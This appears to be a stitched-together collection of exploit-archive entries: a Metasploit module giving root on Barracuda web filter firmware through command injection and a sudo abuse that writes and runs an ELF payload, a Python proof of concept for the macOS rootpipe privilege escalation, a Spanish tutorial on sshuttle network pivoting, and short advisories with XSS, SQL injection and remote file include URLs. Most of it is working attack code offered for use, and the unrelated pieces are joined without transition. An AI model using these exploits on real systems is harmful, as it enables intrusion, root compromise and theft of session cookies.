kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3

# Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit # Exploit Author: xort # Vendor Homepage: https://www.barracuda.com/ # Software Link: https://www.barracuda.com/products/webfilter # Version: Firmware <= 5.0.0.012 # Tested on: Vx and Hardware platforms # # Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating # capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain # root. xort@blacksecurity.org require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root', 'Description' => %q{ This module exploits a remote command execution vulnerability in the Barracuda Firmware Version <= 5.0.0.012 by exploiting a vulnerability in the web administration interface. By sending a specially crafted request it's possible to inject system commands while escalating to root do to relaxed sudo configuration on the local machine. }, 'Author' => [ 'xort', # metasploit module ], 'Version' => '$Revision: 12345 $', 'References' => [ [ 'none', 'none'], ], 'Platform' => [ 'linux'], 'Privileged' => true, 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'Privileged' => false, 'Payload' => { # note: meterpreter can't run on host do to kernel 2.4 incompatabilities + this is stable 'Compat' => { 'ConnectionType' => 'find', } }, 'Targets' => [ ['Linux Universal', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 0)) register_options( [ OptString.new('PASSWORD', [ false, 'Device password', "" ]), OptString.new('ET', [ false, 'Device password', "" ]), OptString.new('USERNAME', [ true, 'Device password', "admin" ]), OptString.new('CMD', [ false, 'Command to execute', "" ]), Opt::RPORT(8000), ], self.class) end def do_login(username, password, et) vprint_status( "Logging into machine with credentials...\n" ) # timeout timeout = 1550; # params password_clear = "admin" real_user = ""; login_state = "out" enc_key = Rex::Text.rand_text_hex(32) et = "1358817515" locale = "en_US" user = username password = Digest::MD5.hexdigest(username+enc_key) enctype = "MD5" password_entry = "" vprint_status( "Starting first routine...\n" ) data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login" vprint_status( "#{data}\n" ) res = send_request_cgi( { 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'cookie' => "", 'data' => data }, timeout) vprint_status( "login got code: #{res.code} ... continuing to second request..." ) File.open("/tmp/output2", 'w+') {|f| f.write(res.body) } # get rid of first yank password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0] vprint_status( "password got back = #{password} - et got back = #{et}\n" ) return password, et end def run_command(username, password, et, cmd) vprint_status( "Running Command...\n" ) exploitreq = [ [ "primary_tab", "BASIC" ], [ "secondary_tab","reports" ], [ "realm","" ], [ "auth_type","Local" ], [ "user", username ], [ "password", password ], [ "et",et ], [ "role","" ], [ "locale","en_US" ], [ "q","" ], [ "UPDATE_new_report_time_frame","custom" ], [ "report_start","2013-01-25 01:14" ], [ "report_end","2013-01-25 02:14" ], [ "type","" ], [ "ntlm_server","" ], [ "kerb_server","" ], [ "local_group","changeme" ], [ "ip_group","20.20.108.0/0.0.0.0" ], [ "ip_address__0","" ], [ "ip_address__1","" ], [ "ip_address__2","" ], [ "ip_address__3","" ], [ "netmask__0","" ], [ "netmask__1","" ], [ "netmask__2","" ], [ "netmask__3","" ], [ "UPDATE_new_report_pattern_values","" ], [ "UPDATE_new_report_pattern_text","" ], [ "UPDATE_new_report_filter_destination","domain" ], [ "filter_domain","" ], [ "UPDATE_new_report_filter_domain","" ], [ "UPDATE_new_report_filter_category","" ], [ "UPDATE_new_report_exclude_from","" ], [ "UPDATE_new_report_exclude_to","" ], [ "UPDATE_new_report_exclude_days","" ], [ "allow","allow" ], [ "block","block" ], [ "warn","warn" ], [ "monitor","monitor" ], [ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ], [ "UPDATE_new_report_filter_count","10" ], [ "UPDATE_new_report_chart_type","vbar" ], [ "UPDATE_new_report_format","html" ], [ "DEFAULT_new_report_group_expand","No" ], [ "UPDATE_new_report_expand_user_count","5" ], [ "UPDATE_new_report_expand_domain_count","5" ], [ "UPDATE_new_report_expand_cat_count","5" ], [ "UPDATE_new_report_expand_url_count","5" ], [ "UPDATE_new_report_expand_threat_count","5" ], [ "report","on" ], [ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_report_id","" ], [ "UPDATE_new_report_enabled","Yes" ], [ "secondary_scope","report" ], [ "secondary_scope_data","" ], [ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ], [ "UPDATE_new_report_delivery","external" ], [ "UPDATE_new_report_delivery_dest_email","" ], [ "UPDATE_new_report_server","new" ], [ "UPDATE_new_external_server_type","smb" ], [ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ], [ "UPDATE_new_external_server","4.4.4.4" ], [ "UPDATE_new_external_server_port","445" ], [ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ], [ "UPDATE_new_external_server_password","asdf" ], [ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ], [ "UPDATE_new_report_frequency", "once" ], [ "UPDATE_new_report_split", "no" ], [ "add_report_id","Apply" ], [ "remover","" ] ] data = Rex::MIME::Message.new data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30) exploitreq.each do |xreq| data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"") end post_data = data.to_s post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------") datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0" vprint_status( "sending..." ) res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi-mod/index.cgi", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'headers' => { 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 'Accept-Language' => "en-US,en;q=0.5" } }) if res.code == 200 vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" ) vprint_status( "password: #{password} et: #{et}\n" ) end vprint_status( "login got code: #{res.code} from report_results.cgi\n" ) File.open("/tmp/output4", 'w+') {|f| f.write(res.body) } end def run_script(username, password, et, cmds) vprint_status( "running script...\n") end def exploit # timeout timeout = 1550; user = "admin" # params real_user = ""; login_state = "out" et = "1358817515" #epoch time locale = "en_US" user = "admin" password = "" enctype = "MD5" password_entry = "" password_clear = "admin" vprint_status("<- Encoding payload to elf string...") elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty? password_clear = "admin" password = datastore['PASSWORD'] et = datastore['ET'] # else - if no 'CMD' string - add code for root shell else password, et = do_login(user, password, et) vprint_status("new password: #{password}\n") end sleep(5) if not datastore['CMD'].nil? and not datastore['CMD'].empty? cmd = datastore['CMD'] end run_command(user, password, et, cmd) # create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (tar), then execute with sudo perm cmd = "echo -ne #{encoded_elf} > /tmp/x ;" cmd += "chmod +x /tmp/x ;" # backup static_routes file cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz" cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes" # execute elf as root cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;" # restore static_routes file cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes" run_command(user, password, et, cmd) sleep(2) handler sleep(5) end end

######################################################## # # PoC exploit code for rootpipe (CVE-2015-1130) # # Created by Emil Kvarnhammar, TrueSec # # Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2 # ######################################################## import os import sys import platform import re import ctypes import objc import sys from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions from Foundation import NSAutoreleasePool def load_lib(append_path): return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path); def use_old_api(): return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0]) args = sys.argv if len(args) != 3: print "usage: exploit.py source_binary dest_binary_as_root" sys.exit(-1) source_binary = args[1] dest_binary = os.path.realpath(args[2]) if not os.path.exists(source_binary): raise Exception("file does not exist!") pool = NSAutoreleasePool.alloc().init() attr = NSMutableDictionary.alloc().init() attr.setValue_forKey_(04777, NSFilePosixPermissions) data = NSData.alloc().initWithContentsOfFile_(source_binary) print "will write file", dest_binary if use_old_api(): adm_lib = load_lib("/Admin.framework/Admin") Authenticator = objc.lookUpClass("Authenticator") ToolLiaison = objc.lookUpClass("ToolLiaison") SFAuthorization = objc.lookUpClass("SFAuthorization") authent = Authenticator.sharedAuthenticator() authref = SFAuthorization.authorization() # authref with value nil is not accepted on OS X <= 10.8 authent.authenticateUsingAuthorizationSync_(authref) st = ToolLiaison.sharedToolLiaison() tool = st.tool() tool.createFileWithContents_path_attributes_(data, dest_binary, attr) else: adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration") WriteConfigClient = objc.lookUpClass("WriteConfigClient") client = WriteConfigClient.sharedClient() client.authenticateUsingAuthorizationSync_(None) tool = client.remoteProxy() tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0) print "Done!" del pool

Sshuttle es un programa que te permite simular casi una VPN a través de una conexión SSH. El uso básico de sshuttle es: sshuttle -r <usuario>@<servidor ssh> <ip de red en la que operará la vpn>/<máscara de red en CIDR> De esta forma, nos conectamos por SSH mediante sshuttle. Si le añadiéramos el argumento -N intentará adivinar la IP de red en la que operará la VPN, por lo que no tendríamos que especificarlo si usamos este argumento. Con esto, si por ejemplo, nuestra red es la 192.168.0.0/24 y nos conectamos a un servidor SSH (192.168.0.10) que está en la misma red nuestra, pero, este servidor, tiene también acceso a la red 192.168.30.0/24, el comando a usar sería el siguiente: sshuttle -r <usuario>@192.168.0.10 192.168.30.0/24 Ya que la red en la que queremos que opere la conexión «VPN» es la 192.168.30.0/24. Sshuttle tiene algunas ventajas y desventajas, al contrario que por ejemplo proxychains, si lanzamos varias VPN una sobre la otra, pasando por diferentes redes, siempre podremos acceder a los recursos de cada una de ellas sin que se tenga en cuenta la red de la última conexión VPN que hemos lanzado. Sin embargo, sshuttle no permite el uso de por ejemplo trazas ICMP o nmap, pero si intentásemos llegar a un servidor web, llegaríamos sin problemas: Así que en este aspecto, esta es la desventaja de Sshuttle, la incapacidad de usar nmap, ping, etc., además de que necesitas privilegios de administrador para poder usarlo: Hasta ahora, si nos fijamos, podemos ver como hemos iniciado sesión con credenciales en el SSH, pero ¿qué ocurre si solo tenemos acceso mediante clave privada? Sshuttle en principio no acepta iniciar sesión usando clave privada, sin embargo se puede bypasear de la siguiente forma: sshuttle -r <usuario>@<servidor ssh> --ssh-cmd "ssh -i <archivo clave privada>" <ip de red en la que operará la vpn>/<máscara de red en CIDR> Ejemplo: De esta manera podemos iniciar sesión usando una clave privada. Si en alguno de los usos de sshuttle nos saliese un error de este estilo: client: Connected. client_loop: send disconnect: Broken pipe client: fatal: server died with error code 255 Podemos solucionarlo con el parámetro -x, el cual nos permite excluir una IP del rango donde la VPN va a operar. Este problema podría ocurrir si el dispositivo al cual nos conectamos, pertenece a la red la cual queremos que la VPN opere. En cualquier caso, si nos ocurre este error haríamos lo siguiente: sshuttle -r <usuario>@<servidor ssh> <ip de red en la que operará la vpn>/<máscara de red en CIDR> -x <servidor ssh> Así, excluiríamos el servidor SSH de la VPN por así decirlo. Además de todo lo visto hasta ahora, sshuttle tiene la opción para que nuestras peticiones DNS también pasen por el proxy, de tal forma que usemos los servidores DNS que la máquina (SSH Server) tenga configurados. El argumento a añadir en la línea de comandos simplemente sería --dns. Lo podemos agregar ya sea al principio o al final. Por último, otro argumento que tiene sshuttle es él -D, el cual básicamente manda al segundo plano la conexión cuando nos conectamos: Y hasta aquí las funcionalidades de sshuttle, al menos las más principales y comunes.

source: https://www.securityfocus.com/bid/51971/info RabbitWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/webmasters/s/RabbitWiki/index.php?title=%22%3E\%3Cscript%3Ealert%28%22rabbit%20says:hello%22%29%3C/script%3E

source: https://www.securityfocus.com/bid/51973/info eFront Community++ is prone to an SQL-injection vulnerability and multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible. eFront Community++ 3.6.10 is vulnerable; other versions may also be affected. SQL Injection: http://www.example.com/communityplusplus/www/administrator.php?ctg=course&edit_course=-1'[SQL INJECTION!] HTML Injection: The vulnerabilities can be exploited by remote attacker with low or high required user inter action. For demonstration or reproduce ... <td xmlns="http://www.w3.org/1999/xhtml" class="layoutColumn center"> <div id="messageBlock" class="block"> <div class="blockContents messageContents"> <table class="messageBlock"> <tbody><tr><td> <img title="_FAILURE" alt="_FAILURE" class="sprite32 sprite32-warning" src="themes/default/images/others/transparent.gif"/> </td> <td class="failureBlock">.....Invalid login name: "> (403) <a onclick="eF_js_showDivPopup('Error Details', 2, 'error_details')" href="javascript:void(0)">More info</a></td> <td><img onclick="window.Effect ? new Effect.Fade($('messageBlock')) : document.getElementById('messageBlock').style.display = 'none';" title="Close" alt="Close" class="sprite32 sprite32-close" src="themes/default/images/others/transparent.gif"/></td></tr> </tbody></table> </div> </div> <table class="centerTable"> ...or <tr class="oddRowColor"> <td> <img title="Forum" alt="Forum" class="forumIcon sprite32 sprite32-forum" src="themes/default/images/others/transparent.gif"/><div> <a href="/communityplusplus/www/administrator.php?ctg= forum&forum=6">"><iframe a="" <<="" onload='alert("VL")' src="a"> <p></p> </div> </td> <td>0 Subforums, 0 Topics, 0 Messages </td> <td><span class = "emptyCategory">Never</span> </td> <td class = "centerAlign"> ...or <div> <a style="white-space: normal;" class="smallHeader" href="/communityplusplus/www/administrator.php ?ctg=forum&poll=1">"><iframe a="" <<="" onload="alert(document.cookie)" src="a"> <p><p>"><iframe src=a onload=alert(document....</p></div> </td> ...or <tr class="oddRowColor defaultRowHeight">.....<td colspan="3" class="emptyCategory">No data found</td></tr> <tr class="defaultRowHeight"><td colspan="4" class="sortedTableFooter"><div class="sortTablefilter"><span id="languagesTable_currentFilter" style="display: none;">"><iframe span="" <<="" onload='alert("VL")' src="a"/></span><input type="text" id="0_sortedTable_filter" onkeypress="if (event.which == 13 || event.keyCode == 13) {eF_js_filterData(0); return false;}" value=""><iframe src=a onload=alert("VL") <" onclick='if (this.value.match("Filter...")) this.value = "";'/></div><span style="vertical-align: middle;">Rows: </span><select onchange="numRows = parseInt(this.options[this.selectedIndex].value);eF_js_changeRowsPerPage(0, numRows)" ...or </tr><tr> <td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1327968000"/></td> <td class="calendar "><a href="administrator.php?ctg=calendar&view_calendar=1327968000"/></td> <td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1328054400">1</a></td> <td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1328140800">2</a></td> <td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1328227200">3</a></td> <td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1328313600">4</a></td> <td class="calendar "> <a href="administrator.php?ctg=calendar&view_calendar=1328400000">5</a></td> </tr>

source: https://www.securityfocus.com/bid/51974/info Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/zimbra/h/calendar?view=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

source: https://www.securityfocus.com/bid/51976/info Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. http://www.example.com/novacms/administrator/modules/moduleslist.php?id=[EV!L]